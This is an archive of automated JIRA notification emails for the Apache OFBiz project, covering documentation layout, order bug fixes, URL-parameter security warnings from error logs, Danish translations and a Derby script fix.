 And could these blocks be stretchable,  (as it's in Confluence by default) 
 ? For instance see http://docs.ofbiz.org/display/OFBIZ/Visual+Themes+-+How+to

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Created: (OFBIZ-2341) The pages should be strechtable

2009-04-22 Thread Jacques Le Roux (JIRA)
The pages should be strechtable
---

 Key: OFBIZ-2341
 URL: https://issues.apache.org/jira/browse/OFBIZ-2341
 Project: OFBiz
  Issue Type: Sub-task
Reporter: Jacques Le Roux


Pages in the doc should be able to strecht. Sometimes you need a wider table or 
\{code} block, etc.
For instance look what happens at the [Creating Practice Application (hello 
world) 
page|http://docs.ofbiz.org/display/OFBIZ/OFBiz+Beginners+Development+Guide+Using+Practice+Application+(helloworld)].
 This page is a reference and often used...

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2287) Update ofbiz.apache.org, log.ofbiz.org and build.ofbiz.org to have the footer stuck to the bottom of the browser

2009-04-22 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2287?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12701501#action_12701501
 ] 

Jacques Le Roux commented on OFBIZ-2287:


Hi Tim,

This is not fair, you should not make such proposition to an addict like me ;) 
Of course I want !

 Update ofbiz.apache.org, log.ofbiz.org and build.ofbiz.org to have the footer 
 stuck to the bottom of the browser
 

 Key: OFBIZ-2287
 URL: https://issues.apache.org/jira/browse/OFBIZ-2287
 Project: OFBiz
  Issue Type: Improvement
  Components: site
Affects Versions: SVN trunk
Reporter: Tim Ruppert
Assignee: Tim Ruppert
 Fix For: SVN trunk


 Just like was done on the template in docs.ofbiz.org, update the page 
 structure and CSS to support the footer going to the bottom of the browser if 
 there is too little content for it to already be there.

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Closed: (OFBIZ-2254) Duplicate order is no longer working

2009-04-22 Thread Jacques Le Roux (JIRA)

 [ 
https://issues.apache.org/jira/browse/OFBIZ-2254?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jacques Le Roux closed OFBIZ-2254.
--

   Resolution: Fixed
Fix Version/s: SVN trunk
   Release Branch 9.04
 Assignee: Jacques Le Roux

Thanks lapog,

I totally wagree with your comment 
// Since we only need the cart items, so set the order id as null
and I checked that there are no other uses of the orderId, only the cart is 
used indeed.

Your patch is in trunk at r767671   and release 9.04 at r767672.



 Duplicate order is no longer working
 

 Key: OFBIZ-2254
 URL: https://issues.apache.org/jira/browse/OFBIZ-2254
 Project: OFBiz
  Issue Type: Bug
  Components: order
Affects Versions: Release Branch 9.04, SVN trunk
Reporter: Jacques Le Roux
Assignee: Jacques Le Roux
 Fix For: Release Branch 9.04, SVN trunk

 Attachments: duplicateorder.patch


 While working on another issue, I found that Duplicate order is not working. 
 It's a duplicate key error :
 duplicate key value violates unique constraint pk_order_header

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2332) searchorders security related error

2009-04-22 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2332?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12701694#action_12701694
 ] 

Jacques Le Roux commented on OFBIZ-2332:


The decision on ML is to rewrite all. More work but certainly the better 
solution...

 searchorders security related error
 ---

 Key: OFBIZ-2332
 URL: https://issues.apache.org/jira/browse/OFBIZ-2332
 Project: OFBiz
  Issue Type: Sub-task
  Components: order
Affects Versions: Release Branch 9.04, SVN trunk
Reporter: Jacques Le Roux
 Fix For: Release Branch 9.04, SVN trunk


 I found this one in error.log on demo server
 2009-04-19 16:10:30,520 (TP-Processor17) [ServiceEventHandler.java:399:ERROR] 
 === Found URL parameter [partyId] passed to secure (https) 
 request-map with uri [searchorders] with an event that calls service 
 [findOrders]; this is not allowed for security reasons! The data should be 
 encrypted by making it part of the request body (a form field) instead of the 
 request URL.; In session [DF1819F1BFDCDFE831FD1ED3B5B2FE88.jvm1]; Note that 
 this can be changed using the service.http.parameters.require.encrypted 
 property in the url.properties file
 2 cases
 a 
 href=@ofbizUrl/searchorders?lookupFlag=YhideFields=YpartyId=${partyId}viewIndex=1viewSize=20/@ofbizUrl
  class=buttontext${uiLabelMap.OrderOtherOrders}/a
 a 
 href=/ordermgr/control/searchorders?lookupFlag=YhideFields=YpartyId=${partyRow.partyId
  + externalKeyParam}viewIndex=1viewSize=20${uiLabelMap.OrderOrders}/a
 I will see later, I continue to look at error.log, to see how much we can get 
 from here...
 [ Afficher » ]
 Jacques Le Roux added a comment - 20/avr./09 12:09 PM I found this one in 
 error.log on demo server 2009-04-19 16:10:30,520 (TP-Processor17) 
 [ServiceEventHandler.java:399:ERROR] === Found URL parameter 
 [partyId] passed to secure (https) request-map with uri [searchorders] with 
 an event that calls service [findOrders]; this is not allowed for security 
 reasons! The data should be encrypted by making it part of the request body 
 (a form field) instead of the request URL.; In session 
 [DF1819F1BFDCDFE831FD1ED3B5B2FE88.jvm1]; Note that this can be changed using 
 the service.http.parameters.require.encrypted property in the url.properties 
 file 2 cases a 
 href=@ofbizUrl/searchorders?lookupFlag=YhideFields=YpartyId=${partyId}viewIndex=1viewSize=20/@ofbizUrl
  class=buttontext${uiLabelMap.OrderOtherOrders}/a a 
 href=/ordermgr/control/searchorders?lookupFlag=YhideFields=YpartyId=${partyRow.partyId
  + externalKeyParam}viewIndex=1viewSize=20${uiLabelMap.OrderOrders}/a I 
 will see later, I continue to look at error.log, to see how much we can get 
 from here...

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Updated: (OFBIZ-2333) createOrderAdjustment security related error

2009-04-22 Thread Jacques Le Roux (JIRA)

 [ 
https://issues.apache.org/jira/browse/OFBIZ-2333?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jacques Le Roux updated OFBIZ-2333:
---

Description: 
Another one found in error.log

2009-04-19 13:49:51,262 (TP-Processor17) [ RequestHandler.java:399:ERROR] 
Request createOrderAdjustment caused an error with the following message: Error 
calling event: org.ofbiz.webapp.event.EventHandlerException: Found URL 
parameter [orderId] passed to secure (https) request-map with uri 
[createOrderAdjustment] with an event that calls service 
[createOrderAdjustment]; this is not allowed for security reasons! The data 
should be encrypted by making it part of the request body (a form field) 
instead of the request URL.

but this one is another exception : (paramString contains orderId...)

form name=addAdjustmentForm method=post 
action=@ofbizUrlcreateOrderAdjustment?${paramString}/@ofbizUrl

The decision on ML is to rewrite all (upstream). More work but certainly the 
better solution...


  was:
Another one in error.log

2009-04-19 13:49:51,262 (TP-Processor17) [ RequestHandler.java:399:ERROR] 
Request createOrderAdjustment caused an error with the following message: Error 
calling event: org.ofbiz.webapp.event.EventHandlerException: Found URL 
parameter [orderId] passed to secure (https) request-map with uri 
[createOrderAdjustment] with an event that calls service 
[createOrderAdjustment]; this is not allowed for security reasons! The data 
should be encrypted by making it part of the request body (a form field) 
instead of the request URL.

but this one is another exception : (paramString contains orderId...)

form name=addAdjustmentForm method=post 
action=@ofbizUrlcreateOrderAdjustment?${paramString}/@ofbizUrl
[ Afficher » ]
Jacques Le Roux added a comment - 20/avr./09 12:19 PM Another one in error.log 
2009-04-19 13:49:51,262 (TP-Processor17) [ RequestHandler.java:399:ERROR] 
Request createOrderAdjustment caused an error with the following message: Error 
calling event: org.ofbiz.webapp.event.EventHandlerException: Found URL 
parameter [orderId] passed to secure (https) request-map with uri 
[createOrderAdjustment] with an event that calls service 
[createOrderAdjustment]; this is not allowed for security reasons! The data 
should be encrypted by making it part of the request body (a form field) 
instead of the request URL. but this one is another exception : (paramString 
contains orderId...) form name=addAdjustmentForm method=post 
action=@ofbizUrlcreateOrderAdjustment?${paramString}/@ofbizUrl



 createOrderAdjustment security related error
 

 Key: OFBIZ-2333
 URL: https://issues.apache.org/jira/browse/OFBIZ-2333
 Project: OFBiz
  Issue Type: Sub-task
  Components: order
Affects Versions: Release Branch 9.04, SVN trunk
Reporter: Jacques Le Roux
 Fix For: Release Branch 9.04, SVN trunk


 Another one found in error.log
 2009-04-19 13:49:51,262 (TP-Processor17) [ RequestHandler.java:399:ERROR] 
 Request createOrderAdjustment caused an error with the following message: 
 Error calling event: org.ofbiz.webapp.event.EventHandlerException: Found URL 
 parameter [orderId] passed to secure (https) request-map with uri 
 [createOrderAdjustment] with an event that calls service 
 [createOrderAdjustment]; this is not allowed for security reasons! The data 
 should be encrypted by making it part of the request body (a form field) 
 instead of the request URL.
 but this one is another exception : (paramString contains orderId...)
 form name=addAdjustmentForm method=post 
 action=@ofbizUrlcreateOrderAdjustment?${paramString}/@ofbizUrl
 The decision on ML is to rewrite all (upstream). More work but certainly the 
 better solution...

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2298) Issue with the new smoothfeather look in OFBiz documentation (Confluence)

2009-04-22 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2298?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12701706#action_12701706
 ] 

Jacques Le Roux commented on OFBIZ-2298:


Just saw the PDF icon is now visible in IE8, so we forgot anything in this 
issue (remainings are now parts of  OFBIZ-2338)

 Issue with the new smoothfeather look in OFBiz documentation (Confluence)
 -

 Key: OFBIZ-2298
 URL: https://issues.apache.org/jira/browse/OFBIZ-2298
 Project: OFBiz
  Issue Type: Improvement
 Environment: NA
Reporter: Jacques Le Roux
Assignee: Tim Ruppert

 The styles associate with
 *
 and
 **
 are not rendering bullets now. Could it be possible to differentiate simple 
 indentation with bullet (numbering is working well) ?

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2285) Patch attached to add Global Era to home page listing of service providers

2009-04-22 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2285?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12701715#action_12701715
 ] 

Jacques Le Roux commented on OFBIZ-2285:


We should discuss about that in PMC... We should create rules, related to 
contributions, etc.
For now the list on main page is very informal, and, IMO, this situation can't 
last... Though most of the services provider there are also main contributors...

 Patch attached to add Global Era to home page listing of service providers
 --

 Key: OFBIZ-2285
 URL: https://issues.apache.org/jira/browse/OFBIZ-2285
 Project: OFBiz
  Issue Type: Task
  Components: site
Reporter: Vince Clark
 Attachments: addGlobalEraToHomePage.patch


 Please review attached patch and consider including us on the home page of 
 the new site.

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Assigned: (OFBIZ-2283) Add Cancel Order Functionality to https://localhost:8443/ordermgr/control/orderview

2009-04-22 Thread Jacques Le Roux (JIRA)

 [ 
https://issues.apache.org/jira/browse/OFBIZ-2283?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jacques Le Roux reassigned OFBIZ-2283:
--

Assignee: Jacques Le Roux

 Add Cancel Order Functionality to 
 https://localhost:8443/ordermgr/control/orderview
 ---

 Key: OFBIZ-2283
 URL: https://issues.apache.org/jira/browse/OFBIZ-2283
 Project: OFBiz
  Issue Type: Improvement
  Components: order
Affects Versions: SVN trunk
Reporter: CJ Horton
Assignee: Jacques Le Roux
Priority: Trivial
 Fix For: SVN trunk

 Attachments: orderinfo.ftl.patch


 This is a simple patch that adds a Cancel Order link on 
 https://localhost:8443/ordermgr/control/orderview
 It adds some code to applications/order/webapp/ordermgr/order/orderinfo.ftl
 I have it check that the currentStatus.statusId is not ORDER_COMPLETED and 
 not ORDER_CANCELLED and if this is true then it renders the cancel link.
 This submits the OrderCancel form which calls the changeOrderStatus 
 controller request which in turn calls the changeOrderStatus service.
 Should there be other checks done before this allowed?  If a production run 
 has been started should the order be allowed to be canceled this way?  Is 
 there anything else I am not thinking of?

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2264) BACS bank sort code and account validation

2009-04-22 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2264?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12701718#action_12701718
 ] 

Jacques Le Roux commented on OFBIZ-2264:


Hi Ray,

I think you have enough right to commit this patch. So is it waiting more 
tests/validations, enhancements ?

 BACS bank sort code and account validation
 --

 Key: OFBIZ-2264
 URL: https://issues.apache.org/jira/browse/OFBIZ-2264
 Project: OFBiz
  Issue Type: New Feature
  Components: accounting
Affects Versions: SVN trunk
 Environment: N/A
Reporter: Ray Barlow
 Attachments: BACS.patch


 The patch includes data changes and services to provide support for the BACS 
 modulus bank account validation process.
 There are some new entities to store the BACS data related to sort codes, 
 substitutions and weights for the validation mechanism. One new screen under 
 the Accounts application to allow standard BACS data importing/updating and a 
 test routine.
 Search http://www.vocalink.com for the published specifications the 
 validation routine follows. The site also contains the data files required to 
 populate the validation tables, I've not included them in the patch because 
 they change over time and I'm not sure on license issues with republishing 
 them.
 For any ISCD data file you'll have to speak to your BACS provider as they 
 aren't published. This implementation handles the oldish text file import and 
 not the newer XML version as I only have ISCD data in text format at the 
 moment.
 Things still in the pipeline:
 Convert account numbers to 8 digit format as per BACS rules.
 AUDDIS
 BACS mail

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Closed: (OFBIZ-2331) This is when, quich ship is used and later we attempt to change the shipment box type under the 'packages' tab.

2009-04-23 Thread Jacques Le Roux (JIRA)

 [ 
https://issues.apache.org/jira/browse/OFBIZ-2331?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jacques Le Roux closed OFBIZ-2331.
--

   Resolution: Fixed
Fix Version/s: SVN trunk
   Release Branch 9.04
 Assignee: Jacques Le Roux

Backported in R9.04 at r767839.

 This is when, quich ship is used and later we attempt to change the shipment 
 box type under the 'packages' tab.
 ---

 Key: OFBIZ-2331
 URL: https://issues.apache.org/jira/browse/OFBIZ-2331
 Project: OFBiz
  Issue Type: Sub-task
Reporter: Jacques Le Roux
Assignee: Jacques Le Roux
 Fix For: Release Branch 9.04, SVN trunk


 https://www.example.com/facility/control/updateShipmentPackage?shipmentId=10012shipmentPackageSeqId=1weight=weightUomId=shipmentBoxTypeId=FXENVinsuredValue=
 This is when, quich ship is used and later we attempt to change the shipment 
 box type under the 'packages' tab.
 Rohit

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2290) Danish translations

2009-04-23 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2290?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12702125#action_12702125
 ] 

Jacques Le Roux commented on OFBIZ-2290:


André,

These changes will be only allowed in trunk, only bug fixes are backported to 
releases

 Danish translations
 ---

 Key: OFBIZ-2290
 URL: https://issues.apache.org/jira/browse/OFBIZ-2290
 Project: OFBiz
  Issue Type: Improvement
  Components: ALL COMPONENTS
Affects Versions: Release Branch 9.04
Reporter: André Herbst
Priority: Trivial



-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Closed: (OFBIZ-2349) Allow HTML Characters in UILabels

2009-04-24 Thread Jacques Le Roux (JIRA)

 [ 
https://issues.apache.org/jira/browse/OFBIZ-2349?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jacques Le Roux closed OFBIZ-2349.
--

Resolution: Invalid

Fixed by Adrian at r768123

 Allow HTML Characters in UILabels
 -

 Key: OFBIZ-2349
 URL: https://issues.apache.org/jira/browse/OFBIZ-2349
 Project: OFBiz
  Issue Type: Improvement
  Components: framework
Affects Versions: SVN trunk
Reporter: Andrew Zeneski
Assignee: Andrew Zeneski
Priority: Minor
 Fix For: SVN trunk

 Attachments: WrapResourceMap.patch


 In response the the thread on dev@ofbiz.apache.org (Re: #160; Codes) the 
 included patch resolves the issue of ignoring HTML in UILabel values, by 
 using the StringUtil.wrapString() method to wrap all resource values. This 
 was not checked in due to the fact I am not sure what the overall effect will 
 be and may break code which I did not test. It may also violate the new 
 security policies.
 The patch is here until it can be determined valid or not.

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Updated: (OFBIZ-2290) Danish translations

2009-04-24 Thread Jacques Le Roux (JIRA)

 [ 
https://issues.apache.org/jira/browse/OFBIZ-2290?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jacques Le Roux updated OFBIZ-2290:
---

Affects Version/s: (was: Release Branch 9.04)
   SVN trunk
Fix Version/s: SVN trunk

 Danish translations
 ---

 Key: OFBIZ-2290
 URL: https://issues.apache.org/jira/browse/OFBIZ-2290
 Project: OFBiz
  Issue Type: Improvement
  Components: ALL COMPONENTS
Affects Versions: SVN trunk
Reporter: André Herbst
Priority: Trivial
 Fix For: SVN trunk




-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2341) The pages should be strechtable

2009-04-24 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2341?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12702269#action_12702269
 ] 

Jacques Le Roux commented on OFBIZ-2341:


Hi Ryan,

I agree it's far better, but it's still not totally good. Have a look at the 
document I referenced above for instance, there are some other documents 
concerned of course. Do you think we can make them good ?

Thanks

 The pages should be strechtable
 ---

 Key: OFBIZ-2341
 URL: https://issues.apache.org/jira/browse/OFBIZ-2341
 Project: OFBiz
  Issue Type: Sub-task
Reporter: Jacques Le Roux

 Pages in the doc should be able to strecht. Sometimes you need a wider table 
 or \{code} block, etc.
 For instance look what happens at the [Creating Practice Application (hello 
 world) 
 page|http://docs.ofbiz.org/display/OFBIZ/OFBiz+Beginners+Development+Guide+Using+Practice+Application+(helloworld)].
  This page is a reference and often used...

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Updated: (OFBIZ-2326) Danish translations for framework

2009-04-24 Thread Jacques Le Roux (JIRA)

 [ 
https://issues.apache.org/jira/browse/OFBIZ-2326?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jacques Le Roux updated OFBIZ-2326:
---

Affects Version/s: (was: Release Branch 9.04)
   SVN trunk
Fix Version/s: SVN trunk

 Danish translations for framework
 -

 Key: OFBIZ-2326
 URL: https://issues.apache.org/jira/browse/OFBIZ-2326
 Project: OFBiz
  Issue Type: Sub-task
  Components: framework
Affects Versions: SVN trunk
Reporter: André Herbst
Priority: Trivial
 Fix For: SVN trunk




-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Updated: (OFBIZ-2327) Danish translations for ecommerce

2009-04-24 Thread Jacques Le Roux (JIRA)

 [ 
https://issues.apache.org/jira/browse/OFBIZ-2327?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jacques Le Roux updated OFBIZ-2327:
---

Affects Version/s: (was: Release Branch 9.04)
   SVN trunk
Fix Version/s: SVN trunk

 Danish translations for ecommerce
 -

 Key: OFBIZ-2327
 URL: https://issues.apache.org/jira/browse/OFBIZ-2327
 Project: OFBiz
  Issue Type: Sub-task
  Components: specialpurpose/ecommerce
Affects Versions: SVN trunk
Reporter: André Herbst
Priority: Trivial
 Fix For: SVN trunk




-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Closed: (OFBIZ-2283) Add Cancel Order Functionality to https://localhost:8443/ordermgr/control/orderview

2009-04-24 Thread Jacques Le Roux (JIRA)

 [ 
https://issues.apache.org/jira/browse/OFBIZ-2283?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jacques Le Roux closed OFBIZ-2283.
--

Resolution: Fixed

Thanks CJ,

Your patch is in trunk at revision: 768212  


 Add Cancel Order Functionality to 
 https://localhost:8443/ordermgr/control/orderview
 ---

 Key: OFBIZ-2283
 URL: https://issues.apache.org/jira/browse/OFBIZ-2283
 Project: OFBiz
  Issue Type: Improvement
  Components: order
Affects Versions: SVN trunk
Reporter: CJ Horton
Assignee: Jacques Le Roux
Priority: Trivial
 Fix For: SVN trunk

 Attachments: orderinfo.ftl.patch


 This is a simple patch that adds a Cancel Order link on 
 https://localhost:8443/ordermgr/control/orderview
 It adds some code to applications/order/webapp/ordermgr/order/orderinfo.ftl
 I have it check that the currentStatus.statusId is not ORDER_COMPLETED and 
 not ORDER_CANCELLED and if this is true then it renders the cancel link.
 This submits the OrderCancel form which calls the changeOrderStatus 
 controller request which in turn calls the changeOrderStatus service.
 Should there be other checks done before this allowed?  If a production run 
 has been started should the order be allowed to be canceled this way?  Is 
 there anything else I am not thinking of?

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2351) correction of the fo.ftl files calling

2009-04-24 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2351?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12702433#action_12702433
 ] 

Jacques Le Roux commented on OFBIZ-2351:


Thanks guys,

Erwan, the FormWidgetExampleScreens.xml only part of your patch is in trunk at 
revision: 768358, R9.04 r768359.


 correction of the fo.ftl files calling
 --

 Key: OFBIZ-2351
 URL: https://issues.apache.org/jira/browse/OFBIZ-2351
 Project: OFBiz
  Issue Type: Improvement
  Components: ALL COMPONENTS
Affects Versions: Release Branch 9.04, SVN trunk
Reporter: Erwan de FERRIERES
Priority: Minor
 Fix For: Release Branch 9.04, SVN trunk

 Attachments: xsl-fo.patch


 as seen this morning with jacopo commit, when calling a fo.ftl file, you have 
 to put xsl-fo/xsl-fo

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Closed: (OFBIZ-2351) correction of the fo.ftl files calling

2009-04-24 Thread Jacques Le Roux (JIRA)

 [ 
https://issues.apache.org/jira/browse/OFBIZ-2351?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jacques Le Roux closed OFBIZ-2351.
--

Resolution: Fixed
  Assignee: Vikas Mayur

 correction of the fo.ftl files calling
 --

 Key: OFBIZ-2351
 URL: https://issues.apache.org/jira/browse/OFBIZ-2351
 Project: OFBiz
  Issue Type: Improvement
  Components: ALL COMPONENTS
Affects Versions: Release Branch 9.04, SVN trunk
Reporter: Erwan de FERRIERES
Assignee: Vikas Mayur
Priority: Minor
 Fix For: Release Branch 9.04, SVN trunk

 Attachments: xsl-fo.patch


 as seen this morning with jacopo commit, when calling a fo.ftl file, you have 
 to put xsl-fo/xsl-fo

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2355) ij.ofbiz does not work

2009-04-24 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2355?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12702561#action_12702561
 ] 

Jacques Le Roux commented on OFBIZ-2355:


Could you please provide a patch ?

http://docs.ofbiz.org/display/OFBADMIN/OFBiz+Contributors+Best+Practices

Thanks

 ij.ofbiz does not work
 --

 Key: OFBIZ-2355
 URL: https://issues.apache.org/jira/browse/OFBIZ-2355
 Project: OFBiz
  Issue Type: Bug
Affects Versions: SVN trunk
 Environment: Linux, SVN Revision: 767865
Reporter: Tamer Sezgin
Priority: Trivial
 Fix For: SVN trunk

   Original Estimate: 0.17h
  Remaining Estimate: 0.17h

 It seems ij.ofbiz in the root directory  does not work..
 I could see 2 problems inside.
 1- HM='-Dderby.system.home=/data/derby'(There is no /data/derby 
 folder.. possibly it should be /runtime/data/derby)
 2- CP=-cp $EE/derby.jar:$EE/derbytools.jar  (There is no derby.jar, and 
 derbytools.jar in the OFBiz package -- but there is derby-10.4.1.3.jar) 
 Suggested Solution:
 1-  Replace HM='-Dderby.system.home=data/derby'  with 
 HM='-Dderby.system.home=runtime/data/derby'
 2- Copy derby.jar and derbytools.jar from the derby distribution to 
 framework/entity/lib/jdbc directory.

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Closed: (OFBIZ-2354) Showing up on Search Orders from Order tab on Party Manager

2009-04-24 Thread Jacques Le Roux (JIRA)

 [ 
https://issues.apache.org/jira/browse/OFBIZ-2354?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jacques Le Roux closed OFBIZ-2354.
--

Resolution: Duplicate

Duplicate of OFBIZ-2332

 Showing up on Search Orders from Order tab on Party Manager
 ---

 Key: OFBIZ-2354
 URL: https://issues.apache.org/jira/browse/OFBIZ-2354
 Project: OFBiz
  Issue Type: Sub-task
 Environment: MAC OS X - Demo Store
Reporter: John D. Hays

 https://localhost:8443/ordermgr/control/searchorders? 
 The Following Errors Occurred:
 Error calling event: org.ofbiz.webapp.event.EventHandlerException: Found URL 
 parameter [partyId] passed to secure (https) request-map with uri 
 [searchorders] with an event that calls service [findOrders]; this is not 
 allowed for security reasons! The data should be encrypted by making it part 
 of the request body (a form field) instead of the request URL.

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Closed: (OFBIZ-2341) The pages should be strechtable

2009-04-24 Thread Jacques Le Roux (JIRA)

 [ 
https://issues.apache.org/jira/browse/OFBIZ-2341?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jacques Le Roux closed OFBIZ-2341.
--

Resolution: Duplicate

I think we only need to deal now with the \{code}, \{quote}, \{warning} blocks. 
So I closed this issue as a duplicate of OFBIZ-2338

 The pages should be strechtable
 ---

 Key: OFBIZ-2341
 URL: https://issues.apache.org/jira/browse/OFBIZ-2341
 Project: OFBiz
  Issue Type: Sub-task
Reporter: Jacques Le Roux

 Pages in the doc should be able to strecht. Sometimes you need a wider table 
 or \{code} block, etc.
 For instance look what happens at the [Creating Practice Application (hello 
 world) 
 page|http://docs.ofbiz.org/display/OFBIZ/OFBiz+Beginners+Development+Guide+Using+Practice+Application+(helloworld)].
  This page is a reference and often used...

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Reopened: (OFBIZ-2341) The pages should be strechtable

2009-04-25 Thread Jacques Le Roux (JIRA)

 [ 
https://issues.apache.org/jira/browse/OFBIZ-2341?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jacques Le Roux reopened OFBIZ-2341:



I reopen this issue because there is not only a problem with block (code, etc.) 
but also std pages. Have a look a 
http://docs.ofbiz.org/pages/viewpage.action?pageId=4098 for instance... Should 
we edit all these pages ? Maybe we can let them as is, since at term we should 
migrate to OFBiz CMS ? I'd really like to have other opinions on this.

Thanks

 The pages should be strechtable
 ---

 Key: OFBIZ-2341
 URL: https://issues.apache.org/jira/browse/OFBIZ-2341
 Project: OFBiz
  Issue Type: Sub-task
Reporter: Jacques Le Roux

 Pages in the doc should be able to strecht. Sometimes you need a wider table 
 or \{code} block, etc.
 For instance look what happens at the [Creating Practice Application (hello 
 world) 
 page|http://docs.ofbiz.org/display/OFBIZ/OFBiz+Beginners+Development+Guide+Using+Practice+Application+(helloworld)].
  This page is a reference and often used...

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Closed: (OFBIZ-2291) Clarify Non-Serialized Inventory Reservations / Add Flexibility

2009-04-25 Thread Jacques Le Roux (JIRA)

 [ 
https://issues.apache.org/jira/browse/OFBIZ-2291?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jacques Le Roux closed OFBIZ-2291.
--

Resolution: Fixed
  Assignee: Joe Eckard

Thanks Joe,

Your patch is in trunk at revision: 768611  


 Clarify Non-Serialized Inventory Reservations / Add Flexibility
 ---

 Key: OFBIZ-2291
 URL: https://issues.apache.org/jira/browse/OFBIZ-2291
 Project: OFBiz
  Issue Type: Improvement
  Components: product
Affects Versions: SVN trunk
Reporter: Joe Eckard
Assignee: Joe Eckard
Priority: Minor
 Fix For: SVN trunk

 Attachments: patch.txt


 Right now, reservations will only be made against a non-serialized inventory 
 item if the statusId field is null. This patch changes this behavior to check 
 for specific statuses that should exclude the inventory item, instead of 
 checking for a non-empty status.

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Closed: (OFBIZ-2355) ij.ofbiz does not work

2009-04-25 Thread Jacques Le Roux (JIRA)

 [ 
https://issues.apache.org/jira/browse/OFBIZ-2355?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jacques Le Roux closed OFBIZ-2355.
--

   Resolution: Fixed
Fix Version/s: Release Branch 9.04
 Assignee: Jacques Le Roux

Thanks  Tamer,

Your patch is in trunk at revision: 768608. I have also upated Derby at 
10.4.2.0 in trunk
I backported your patch to R9.04 at r768614, and only put 
derbytools-10.4.1.13.jar in framework\entity\lib\jdbc



 ij.ofbiz does not work
 --

 Key: OFBIZ-2355
 URL: https://issues.apache.org/jira/browse/OFBIZ-2355
 Project: OFBiz
  Issue Type: Bug
Affects Versions: SVN trunk
 Environment: Linux, SVN Revision: 767865
Reporter: Tamer Sezgin
Assignee: Jacques Le Roux
Priority: Trivial
 Fix For: Release Branch 9.04, SVN trunk

 Attachments: ij.ofbiz.patch

   Original Estimate: 0.17h
  Remaining Estimate: 0.17h

 It seems ij.ofbiz in the root directory  does not work..
 I could see 2 problems inside.
